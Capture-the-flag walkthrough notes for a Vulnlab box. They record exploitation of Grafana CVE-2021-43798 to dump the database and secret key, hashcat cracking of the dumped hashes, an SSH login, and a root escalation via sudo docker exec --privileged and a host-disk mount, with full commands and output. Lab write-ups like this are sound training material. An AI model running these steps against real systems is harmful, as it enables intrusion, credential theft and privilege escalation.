Here are my notes on the DATA box from Vulnlab, which was deployed to Hackthebox.
DATA-VL: 10.10.91.32
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp - Grafana Web Service
Grafana version 8.0.0 is shown on the main page.
No luck with admin:admin or other default creds.
No SQL login bypass.
-Vulnerable to CVE-2021-43798.
https://github.com/taythebot/CVE-2021-43798 - Main Exploit
https://github.com/jas502n/Grafana-CVE-2021-43798 - Use it to crack the hashes with the secret_key from defaults.ini.
go run exploit.go -target http://10.10.91.32:3000 -dump-database -output grafana.db
admin:7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8:YObSoLj55S
boris:dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8:LCBhdtJWjl
go run exploit.go -target http://10.10.91.32:3000 -dump-config -output defaults.ini
┌──(root㉿kali)-[/home/…/BOXES/COMP/DATA/CVE-2021-43798]
└─# cat defaults.ini | grep "secret_key"
secret_key = SW2YcwTIb9zpOOhoPsMm
secret_key =
Grafana Password Cracking:
#After you have found grafana.db through one of the various exploits.
#Requires Hashcat.
https://vulncheck.com/blog/grafana-cve-2021-43798
https://github.com/iamaldi/grafana2hashcat/tree/main
#Requires a hash and a salt to make this work.
┌──(root㉿kali)-[/home/…/COMP/DATA/CVE-2021-43798/grafana2hashcat]
└─# cat grafana_hashes
7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl
┌──(root㉿kali)-[/home/…/COMP/DATA/CVE-2021-43798/grafana2hashcat]
└─# python3 grafana2hashcat.py grafana_hashes
[+] Grafana2Hashcat
[+] Reading Grafana hashes from: grafana_hashes
[+] Done! Read 2 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[*] Outfile was not declared, printing output to stdout instead.
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
[+] Now, you can run Hashcat with the following command, for example:
hashcat -m 10900 hashcat_hashes.txt --wordlist wordlist.txt
Save those two hashcat-format hashes to a file, then crack them with hashcat:
hashcat -m 10900 grafana_hashes_hashcat --wordlist /usr/share/wordlists/rockyou.txt
boris:beautiful1
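Added example (not part of the original notes and not grafana2hashcat's own code): what the conversion above does to each "hash,salt" pair, plus a check that uses the same storage format to audit your own Grafana user table against a banned-password list. The function names and the sample rows are made up for illustration; the iteration count comes from the converter output above and the 50-byte key length follows from the 100 hex characters per hash.

```python
import base64
import hashlib
import hmac

# Parameters as seen in the converter output above: PBKDF2-HMAC-SHA256,
# 10000 iterations; 100 hex chars in the DB = 50-byte derived key.
ITERATIONS = 10000
KEY_LEN = 50


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def to_hashcat(hex_hash: str, salt: str) -> str:
    """Re-encode one 'hash,salt' pair as a hashcat mode 10900 line."""
    raw = bytes.fromhex(hex_hash.strip())
    if len(raw) != KEY_LEN:
        raise ValueError(f"expected a {KEY_LEN}-byte hash, got {len(raw)} bytes")
    # The salt is used as raw ASCII bytes, so it is base64-encoded as-is.
    return f"sha256:{ITERATIONS}:{_b64(salt.strip().encode())}:{_b64(raw)}"


def grafana_hash(password: str, salt: str) -> str:
    """Derive the hex string stored in the password column."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                             ITERATIONS, KEY_LEN)
    return dk.hex()


def weak_accounts(rows, banned):
    """Return logins whose stored hash matches a password on the banned list."""
    hits = []
    for login, hex_hash, salt in rows:
        if any(hmac.compare_digest(grafana_hash(pw, salt), hex_hash.lower())
               for pw in banned):
            hits.append(login)
    return hits


if __name__ == "__main__":
    # Constructed rows (not from the box): one weak and one random password.
    rows = [("alice", grafana_hash("Summer2023", "saltAAAA01"), "saltAAAA01"),
            ("bob", grafana_hash("k7#Vq9!xTz2@", "saltBBBB02"), "saltBBBB02")]
    print(weak_accounts(rows, ["password", "Summer2023"]))  # ['alice']
    print(to_hashcat(rows[0][1], rows[0][2]))
```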
┌──(root㉿kali)-[/home/kali/BOXES/COMP/DATA]
└─# hydra -l boris -p beautiful1 10.10.91.32 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-14 22:21:09
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://10.10.91.32:22/
[22][ssh] host: 10.10.91.32 login: boris password: beautiful1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-14 22:21:11
USER SHELL !
USER.TXT: [REDACTED]
PRIV ESC:
sudo -l docker exec priv esc notes:
boris@ip-10-10-10-11:~$ sudo -l
Matching Defaults entries for boris on ip-10-10-10-11:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User boris may run the following commands on ip-10-10-10-11:
(root) NOPASSWD: /snap/bin/docker exec *
boris@ip-10-10-10-11:~$
https://blog.yunolay.com/?p=262#Privilege_Escalation_Root
Go back to that same LFI exploit to read /etc/hostname and you will find the Docker container ID:
e6ff5b1cbc85
sudo /snap/bin/docker exec --privileged --user 0 -i -t e6ff5b1cbc85 /bin/bash
fdisk -l
bash-5.1# cd /mnt
bash-5.1# mkdir test
bash-5.1# mount /dev/xvda1 /mnt/test
bash-5.1# pwd
/mnt/test/root
bash-5.1# ls
root.txt snap
bash-5.1# cat root.txt
VL{<REDACTED>}
CVE-2021-4034 - WORKS ! - ROOT SHELL
ROOT.TXT: [REDACTED]